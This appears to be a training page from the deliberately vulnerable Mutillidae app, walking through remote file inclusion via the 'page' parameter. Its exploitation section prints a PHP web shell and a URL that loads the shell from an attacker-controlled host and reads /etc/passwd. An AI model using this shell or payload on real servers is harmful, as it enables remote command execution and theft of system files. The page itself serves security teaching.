Remote File Inclusion


Overview

Remote file inclusion allows an attacker to include file remote (from the web servers point of view) possibly allowing code execution, denial of service, and data disclosure.

Discovery Methodology

The page displayed in Mutillidae is determined by the value of the "page" parameter. What would happen the "page" parameter was changed to a filename URI which is located on a remote server but not intended to be served?

Exploitation

A URI can be used to specify a remote file such as http://www.google.com.

Click this link to load the Google search page into Mutillidae. Note the page parameter contains the URL to the search page. index.php?page=http://www.google.com

If we host our own content, we could control the content of the page loaded by the page parameter. For example, host a small PHP web shell file on a site you control.
<?php echo "<pre>"; echo "shell_exec ".$_REQUEST["pCommand"]."\n\n"; echo shell_exec($_REQUEST["pCommand"]); echo "</pre>"; ?>
Once the web shell is ready to pull from the attacking server, create a hyperlink that will exploit the remote file inclusion vulnerability in the index.php page to incorporate the web shell into the web page.
http://mutillidae/index.php?page=http://[ATTACKING SERVER IP ADDRESS]/shell.php?pCommand=cat%2b%2fetc%2fpasswd
Videos


Click here to watch How to Exploit Local File Inclusion Vulnerability using Burp-Suite
Click here to watch ISSA 2013 Web Pen-testing Workshop - Part 6 - Local/Remote File Inclusion